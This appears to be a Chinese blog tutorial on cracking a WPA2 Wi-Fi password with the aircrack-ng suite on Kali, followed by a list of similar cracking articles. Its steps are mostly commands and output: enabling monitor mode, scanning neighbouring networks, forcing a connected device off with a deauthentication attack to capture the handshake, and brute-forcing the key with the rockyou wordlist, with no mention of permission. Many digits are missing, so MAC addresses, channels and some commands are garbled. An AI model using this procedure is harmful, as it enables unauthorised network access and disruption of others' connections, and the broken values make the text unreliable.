1.查看网卡名称:iwconfig

有一块 名为wlan0 的无线网卡通过一下命令排除影响因素

root@jkali:~# iwconfig

lo        no wireless extensions.

wlan0     IEEE 802.11  ESSID:"jlysltqx"

          Mode:Managed  Frequency:2.462 GHz  Access Point: :6C::0A:CE:7D

          Bit Rate=144.4 Mb/s   Tx-Power= dBm

          Retry short limit:   RTS thr:off   Fragment thr:off

          Encryption key:off

          Power Management:on

          Link Quality=/  Signal level=- dBm

          Rx invalid nwid:  Rx invalid crypt:  Rx invalid frag:

          Tx excessive retries:  Invalid misc:   Missed beacon:

2.通过一下命令排除影响因素

root@jkali:~# service network-manager stop

root@jkali:~# airmon-ng check kill

Killing these processes:

  PID Name

  wpa_supplicant

3.启动monitor 模式

root@jkali:~# airmon-ng start wlan0

PHY    Interface    Driver        Chipset

phy0    wlan0        iwlwifi        Intel Corporation Wireless  /  (rev )

        (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)

        (mac80211 station mode vif disabled for [phy0]wlan0)

4.查看是否进入了监控模式

root@jkali:~# iwconfig

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power= dBm

          Retry short limit:   RTS thr:off   Fragment thr:off

          Power Management:on

lo        no wireless extensions.

5.进行抓包

root@jkali:~# airodump-ng wlan0mon

 CH   ][ Elapsed:  s ][ -- :                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 0C:4B::0A:0A:B5   -                         -   WPA              <length:  >

 :6C::0A:CE:7D  -                         WPA2 CCMP   PSK  jlysltqx

 0C:6A:BC::AB:ED  -                         WPA2 CCMP   PSK  ChinaNet-fG5b

 :::C6::0C  -                          WPA2 CCMP   PSK  ChinaNet-sWTz

 E0:::7F::  -                           WPA2 CCMP   PSK  ChinaNet-SrPw

 :1D::3B::E8  -                          WPA2 CCMP   PSK  CMCC-er99

 8E:::C9::EB  -                          WPA2 CCMP   PSK  Guest_53EB

 :::C9::EB  -                          WPA2 CCMP   PSK  Master

 BC:D1::BD:F1:  -                           WPA2 CCMP   PSK  ¬����      

我们来抓jlysltqx,他的bssid为::6C::0A:CE:7D,ch 为 ,加密方式为wpa2

6.只抓我们要的wifi 的包

root@jkali:~/kk# airodump-ng wlan0mon --bssid 28:6C:07:0A:CE:7D -c 11 -w wpa

 CH  ][ Elapsed:  s ][ -- :                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :6C::0A:CE:7D  -                    WPA2 CCMP   PSK  jlysltqx                                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   

 :6C::0A:CE:7D  3C:B6:B7:E0:4C:  -    0e- 0e

 :6C::0A:CE:7D  :3E::2A::6A  -     -

7.6中未获取到握手信息,我们把其中一台设备断网,让其重连来航偶去握手信息

aireplay-ng -  -a :6C::0A:CE:7D -c 3C:B6:B7:E0:4C: wlan0mon

8.重新执行6获取握手信息

root@jkali:~/kk# airodump-ng wlan0mon --bssid :6C::0A:CE:7D -c  -w wpa

 CH  ][ Elapsed:  min ][ -- : ][ WPA handshake: :6C::0A:CE:7D                                         

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 :6C::0A:CE:7D  -                        WPA2 CCMP   PSK  jlysltqx                                                                       

 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                                                                   

 :6C::0A:CE:7D  3C:B6:B7:E0:4C:  -    0e- 0e         jlysltqx

 :6C::0A:CE:7D  :3E::2A::6A  -     -

9.查看抓到的包 wpa-04.cap 就是我们抓成功的包

root@jkali:~/kk# ls -lrt

总用量

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root      1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root     1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root  1月   : wpa-.cap

-rw-r--r--  root root      1月   : wpa-.kismet.netxml

-rw-r--r--  root root       1月   : wpa-.kismet.csv

-rw-r--r--  root root       1月   : wpa-.csv

-rw-r--r--  root root   1月   : wpa-.cap

10.利用字典来进行解密(若字典文件未解压,请自行解压)

aircrack-ng -w /usr/share/wordlists/rockyou.txt wpa-.cap

11.破解完成后恢复网络

root@jkali:~# service network-manager start
root@jkali:~# airmon-ng stop wlan0mon

PHY    Interface    Driver        Chipset

phy0    wlan0mon    iwlwifi        Intel Corporation Wireless  /  (rev )

        (mac80211 station mode vif enabled on [phy0]wlan0)

        (mac80211 monitor mode vif disabled for [phy0]wlan0mon)

kali 破解wifi的更多相关文章

  1. 利用kali破解wifi密码

    准备工具 1.笔记本 2.USB无线上网卡(必备) 3.kali系统 4.密码字典 第一种方法 暴力破解法 何为暴力破解呢,其实就是一个一个密码去试,直到正确的密码. 现在的wifi一般加密都是: 1 ...

  2. kali破解wifi密码

    开始 1.选择合适的网卡,有些网卡kali识别不了,我用的网卡信息 2.网卡开启监听模式 3.查看监听模式是否开启成功(网卡名称变成wlan0mon说明已经开启成功) 4.输入“airodump-ng ...

  3. Kali Linux下破解WIFI密码挂载usb无线网卡的方法

    Kali Linux下破解WIFI密码挂载usb无线网卡的方法 时间:2014-10-12    来源:服务器之家    投稿:root 首先我要说的是,wifi密码的破解不是想象中的那么容易,目前还 ...

  4. Kali Linux使用Aircrack破解wifi密码(wpa/wpa2)

    Kali Linux能做很多事,但是它主要以渗透测试及'破解wifi密码'闻名. 如果你使用Macbook 请看 使用macbook破解WPA/WPA2 wifi密码 要求: 安装有Kali Linu ...

  5. Kali Linux破解wifi密码(无须外置网卡)

    环境准备:  方式一(选择该方式):Kali Linux.笔记本一台.U盘(至少8G)  方式二:Kali Linux.外置网卡.笔记本一台.VM   特别说明,主要是使用方式一进行破解,如果有外置网 ...

  6. 运用Fluxion高效破解WiFi密码

    Fluxion是一个无线破解工具,这个工具有点像是Linset的翻版.但是与Linset比较起来,它有着更多有趣的功能.目前这个工具在Kali Linux上可以完美运行. 工作原理 1.扫描能够接收到 ...

  7. 破解Wifi

    牛刀小试:Wifi破解的原理. 准备工具:   1:Kali Linux系统 2:一块好用的无线网卡 (推荐免驱版,网上也有推荐,可以去百度上google一下) 3:WPA字典(用来爆破抓获的握手包) ...

  8. 【无线安全实践入门】破解WiFi密码的多个方法

    本文希望可以帮助到想要学习接触此方面.或兴趣使然的你,让你有个大概的印象. 文中可能存在错误操作或错误理解,望大家不吝指正. !阅前须知! 本文是基于我几年前的一本笔记本,上面记录了我学习网络基础时的 ...

  9. 破解WIFI教程

    今日主题:如何破解WIFI 准备工具 笔记本一台 usb无线网卡[我用的是小米的] kali系统[可以在虚拟机里装,建议用2019年及以下版本] VMware Workstation15虚拟机安装 可 ...

随机推荐

  1. C#左移运算符

     << 左移操作符.简单理解是对变量进行与2的n次乘方的运算.比如x<<1=x*2x<<2=x*4x<<3=x*8x<<4=x*16依此类推 ...

  2. asp.net webapi 随笔

    第一次写博客,文笔有限,记录下学习的过程 话不多说,直接开干 首先用vs2017建立一个空网站项目,然后只勾选api 项目建立后,如下结构 其中WebApiConfig类配置了路由相关信息 publi ...

  3. .net core - 配置管理 - json文件配置

    Json 文件配置 public class Startup { public Startup(IHostingEnvironment env) { var builder = new Configu ...

  4. html5样式初始化,你值得拥有!!

    /*万能清除法*/     *{padding:0;margin:0;}     li{list-style: none;}     img{vertical-align:top;border: 0; ...

  5. Android 工作流提交审批填写审批意见PopWindow工具类

    公司的项目中几乎都会有走工作流这个环节,为了提高效率,现在特意把弹出的填写审批意见PopWindow改转成工具类,提高效率,免得下次又得整.先看运行效果.

  6. 掌握 Async/Await

    摘要: 还不用Async/Await就OUT了.. 原文:掌握 Async/Await 作者:Jartto Fundebug经授权转载,版权归原作者所有. 前端工程师肯定都经历过 JS 回调链狱的痛苦 ...

  7. 维护中常用的k8s和docker命令

    kubernet命令 查看所有pod的信息: kubectl get pod --all-namespaces -o wide 查看命名为kube-system的pod kubectl get pod ...

  8. MATLAB读取一个文件夹下的多个子文件夹中的多个指定格式的文件

    MATLAB需要读取一个文件夹下的多个子文件夹中的指定格式文件,这里以读取*.JPG格式的文件为例 1.首先确定包含多个子文件夹的总文件夹 maindir = 'C:\Temp Folder'; 2. ...

  9. 逆向破解之160个CrackMe —— 029

    CrackMe —— 029 160 CrackMe 是比较适合新手学习逆向破解的CrackMe的一个集合一共160个待逆向破解的程序 CrackMe:它们都是一些公开给别人尝试破解的小程序,制作 c ...

  10. 中国网络安全行业分类及全景图2019H1

    中国网络安全行业分类及全景图2019H1   概述 中国网络安全行业分类及全景图: 一级分类包含了端点安全.网络安全.应用安全.数据安全.身份与访问管理和安全管理六个一级分类,这些一级分类分别对应了网 ...